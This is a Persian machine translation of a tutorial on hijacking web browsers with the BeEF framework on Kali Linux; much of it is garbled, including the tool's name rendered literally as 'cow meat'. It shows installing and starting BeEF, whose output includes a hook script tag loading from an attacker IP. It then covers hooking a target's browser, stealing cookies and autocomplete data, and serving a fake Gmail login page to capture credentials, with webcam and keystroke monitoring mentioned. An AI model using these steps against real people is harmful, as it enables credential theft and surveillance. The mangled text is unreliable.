هک مرورگرهای وب با گوشت گاو به کنترل وب کم Phish برای اعتبار و بیشتر

مردم با استفاده از مرورگر برای همه نوع از همه چیز و به طور کلی اعتماد ما بسیاری از اطلاعات شخصی خود را به آنها. همین دلیل است که مرورگرها کامل سطح حمله یک هکر به این دلیل که هدف ممکن است حتی نمی دانند که آنها در حال آلوده و خوراک شما تمام اطلاعات شما می خواهید.

برای انجام این کار شما نیاز به فریب کاربر را به کلیک کردن بر روی یک لینک. برای تولید این لینک شما می توانید با استفاده از یک ابزار به نام گوشت گاو استفاده می شود که به طور از پیش نصب شده بر روی کالی لینوکس.

شبیه به Metasploit و گوشت گاو که مخفف مرورگر بهره برداری چارچوب یک چارچوب برای راه اندازی حملات. بر خلاف با Metasploit آن را خاص برای راه اندازی حملات در برابر مرورگرهای وب است. در برخی از موارد ما می تواند استفاده از گوشت گاو در رابطه با Metasploit برای شروع پیشرفته تر حمله حالات.

ابزار توسعه یافته توسط یک گروه از توسعه دهندگان رهبری وید Alcorn. ساخته شده در آشنا Ruby on Rails پلت گاو طراحی شده برای کشف آسیب پذیری در مرورگرها و تست آنها. در خصوص گوشت گاو پلت فرم بسیار عالی برای تست مرورگر و آسیب پذیری به cross-site scripting (XSS) و دیگر حملات تزریق.

گوشت گاو می توانید یک لینک است که می تواند مسیر هدف و حتی اجرای ماژول برای هر دو تشدید مجوز و جمع آوری اطلاعات بیشتر در مورد فرد پشت کامپیوتر. آن را حتی می توانید از اسکن پشت شبکه فرد در, است که بسیار قابل توجه از آنجا که شما می توانید گرفتن عکس با وب کم, دیدن آنچه که آنها در حال تایپ کردن و راه اندازی صفحات فیشینگ را امتحان کنید و دریافت اعتبار.

مرحله 1: نصب گوشت گاو

گوشت گاو ساخته شده است حق را به کالی لینوکس 2019.2 و بنابراین شما باید برای نصب هر چیزی اگر شما در حال اجرا یک از این نسخه بر روی کامپیوتر شما.

در اواسط سال 2019 کالی حذف گوشت گاو به عنوان یک پیش نصب شده بهره برداری ابزار حرکت آن را از "kali-linux-default" به "kali-linux-large" metapackage. که بدان معنی است که اگر شما از نصب یک تازه نسخه Kali شما دیگر نمی خواهد باید گوشت گاو هر چند شما ممکن است آن را حفظ کند اگر شما به سادگی خود را به روز نسخه های قدیمی تر از کالی به 2019.3 یا بالاتر.

اگر شما در حال حاضر آن را با استفاده از دستور زیر به روز رسانی همه چیز. و اگر شما آن را ندارید همان دستور آن را نصب کنید. فقط مطمئن شوید که به استفاده از گوشت گاو-xss و نه "گاو" دلیل دوم این است که یک مفسر زبان برنامه نویسی متفاوت است. (ما ساخته شده است که اشتباه ما در ویدئو بالا را به انجام همان.)

~$ sudo apt نصب گوشت گاو-xss

آیا شما تا به حال آن نصب شده از قبل یا تا به حال به آن را نصب کنید بقیه همان است.

مرحله 2: باز کردن گاو خدمات

هنگامی که گوشت گاو نصب شده است, شما می توانید آن را تحت برنامه های کاربردی> سیستم خدمات پس از آن با کلیک بر روی "گوشت گاو شروع می شود." آن را به باز کردن یک پنجره ترمینال برای شروع سرویس.

اگر شما نمی بینید هر گاو-ابزارهای مرتبط در آن پوشه و یا اگر شما نمی بینید که پوشه در همه ممکن است شما را به نصب "گاو" و نه "گوشت گاو-xss" بنابراین مطمئن شوید که به انجام رسانند. (شما همچنین می توانید شروع به گوشت گاو از بهره برداری از ابزارهای پوشه ای که آن را "beef xss framework.)

> اجرای "sudo گوشت گاو-xss"
[sudo] password for کالی: [-] شما با استفاده از پیش فرض اعتبار
[-] (رمز عبور باید متفاوت از "گاو")
[-] لطفا نوع رمز عبور جدید برای گوشت گاو کاربر: [*] لطفا صبر کنید برای گوشت گاو سرویس برای شروع.
[*]
[*] شما ممکن است نیاز به به روز کردن مرورگر خود را پس از آن باز می شود.
[*]
[*] وب سایت UI: http://127.0.0.1:3000/ui/panel
[*] قلاب: <script src="http://<IP>:3000/hook.js"></script>
[*] مثال: <script src="http://127.0.0.1:3000/hook.js"></script> ● گوشت گاو-xss.خدمات - LSB: گوشت گاو بارگذاری: بارگذاری (/etc/init.d/گوشت گاو-xss; تولید) فعال: فعال (در حال اجرا) پس از پنج شنبه 2020-05-08 12:51:38 EDT; 5s پیش اسناد: مرد:systemd ، sysv-ژنراتور(8) فرایند: 1432 ExecStart+/etc/init.d/گوشت گاو-xss شروع (کد=هیجان زده, status=0/موفقیت) وظایف: 10 (حد: 6715) حافظه: 140.8 M CGroup: /system.برش/گوشت گاو-xss.خدمات └─1438 روبی /usr/share/گوشت گاو-xss/گوشت May 08 12:51:42 کالی گوشت گاو[1]: شروع LSB: گوشت گاو...
May 08 12:51:42 کالی گوشت گاو[1]: آغاز LSB: گوشت گاو. [*] باز کردن Web UI (http://127.0.0.1:3000/ui/panel) در: 5... 4... 3... 2... 1...

اگر شما به اشتباهات که در آن مرورگر خود را نتواند به بار شما می توانید دور زدن موضوع با باز کردن مورد نظر خود را مرورگر وب مانند فایرفاکس یا کروم و رفتن به آدرس زیر است که برای localhost (127.0.0.1) وب سرور در بندر 3000.

http://127.0.0.1:3000/ui/panel

گام 3: ورود به گوشت گاو خدمات

هنگامی که رابط مرورگر باز می شود, شما نیاز به ورود به گوشت گاو خدمات. به طور پیش فرض اعتبار گوشت گاو برای نام کاربری و گوشت گاو برای رمز عبور. اما شما ممکن است وادار به ایجاد یک رمز عبور برای خود گوشت گاو جلسه (که در بالا دیده می شود) و در آن صورت شما خواهد با استفاده از گوشت گاو به عنوان نام کاربری و هر چه رمز عبور شما را انتخاب کرد.

پس از ورود موفقیت شما باید ببینید "شروع" صفحه با اطلاعات در مورد چگونه گوشت کار می کند. در سمت چپ وجود دارد قلاب مرورگرهای ستون است که در آن تمام مرورگرهای شما کنترل به پایان خواهد رسید.

گام 4: قلاب هدف مرورگر

کلید موفقیت با گوشت گاو است به "قلاب" یک مرورگر است. این اساسا بدان معنی است که ما باید به هدف بازدید از یک وب آسیب پذیر برنامه با "hook.js" فایل جاوا اسکریپت. برای تمرین گوشت گاو فراهم می کند یک صفحه وب به صورت localhost خود را با ظرفیت ترابری در آن دیدار که برای دیدن چگونه کار می کند.

http://127.0.0.1:3000/demos/basic.html

تزریق کد در قلاب مرورگر در پاسخ به دستورات از گوشت گاو سرور که ما کنترل. از وجود ما می تواند انجام بسیاری از بازیگوش چیز در مورد کامپیوتر.

گام 5: مشاهده جزئیات مرورگر

من چند قلاب مرورگرهای اما من قصد دارم نگاهی به کروم یکی. با کلیک بر روی قلاب مرورگر و آن را به پرش شما را به "جزئیات" تب فراهم می کند که اطلاعات در مورد قلاب مرورگر. معدن نشان می دهد که کروم در ارزش.

این برگه را به شما نشان می دهد بسیار بیشتر از این است. برای من که پلت فرم Linux x86_64; که آن را به کروم پی دی اف, افزونه کروم, PDF Viewer و بومی مشتری پلاگین ها; اجزاء عبارتند از webgl webrtc و websocket; و دیگر اطلاعات جالب.

مرحله 6: اجرای دستورات در مرورگر

در حال حاضر که ما رو به هدف مرورگر ما می تواند اجرای برخی از ماژول های ساخته شده در از "دستورات" تب.

وجود دارد بیش از 300 ماژول از مرورگر هک مهندسی اجتماعی از جمله اما نه محدود به:

• بازدید دریافت دامنه (مرورگر)
• بازدید دریافت آدرس (browser)
• وب (مرورگر)
• تمام کوکی ها (فرمت)
• چنگ زدن به مخاطبین گوگل (پسوند)
• تصویر (فرمت)
• سرقت تکمیل خودکار (مهندسی اجتماعی)
• گوگل فیشینگ (مهندسی اجتماعی)

هنگامی که شما پیدا کردن یک ماژول شما می خواهید به استفاده از آن را انتخاب کنید و سپس با کلیک بر روی "اجرا" را در زیر توضیحات آن. به عنوان مثال من قصد دارم به استفاده از "گوگل فیشینگ" ماژول در "مهندسی اجتماعی" پوشه.

پس از اجرای آن جعلی جیمیل, ورود به صفحه ظاهر خواهد شد در قلاب مرورگر. کاربر ممکن است فکر می کنم دو بار در مورد قرار دادن نام کاربری و رمز عبور و یک بار آنها را انجام دهید ما آن شوید. پس از آن آنها را به گوگل سایت به عنوان اگر آنها وارد شده به طور منظم.

برای پیدا کردن نام کاربری و رمز عبور ما وارد شده فقط بر روی فرمان در ماژول نتایج تاریخچه ستون. برای من دیدن "hfhfhf" به عنوان کاربر و "sdliasdflihasdflh" به عنوان رمز عبور. شما همچنین می توانید این اطلاعات را از "ثبت" تب.

اگر ما می خواستیم به ما می تواند سفارشی URL که گوگل فیشینگ ماژول استفاده می کند در مورد شما می خواهید به استفاده از چیزی بیش از باور نسبت به سبک قدیمی Gmail رابط.

پس ما باید مرورگر رو وجود دارد امکانات تقریبا نامحدود از آنچه که ما می توانید انجام دهید. شما حتی می تواند اهرم گوشت گاو برای سیستم عامل حملات. برای نمونه های بیشتر از آنچه که گوشت می تواند کمک به شما انجام مانند به دست آوردن دسترسی به وب کم و نظارت بر, کلید, اتمام اینترنتی ما سلاح آزمایشگاه ویدئو بالا.

گوشت گاو قدرتمند Web Browser حمله ابزار

گوشت گاو فوق العاده ای و قدرتمند برای بهره برداری از مرورگرهای وب و آن را وحشتناک مثال چرا شما هرگز نباید با کلیک بر روی لینک های مشکوک. حتی اگر همه چیز خوب نگاه کنید, شما باید واقعا مراقب باشید با هر چیزی که بالا میآید را در مرورگر خود برای اجازه دسترسی به وب کم خود و یا صوتی و یا که شما نیاز به وارد کنید در اعتبار حساب.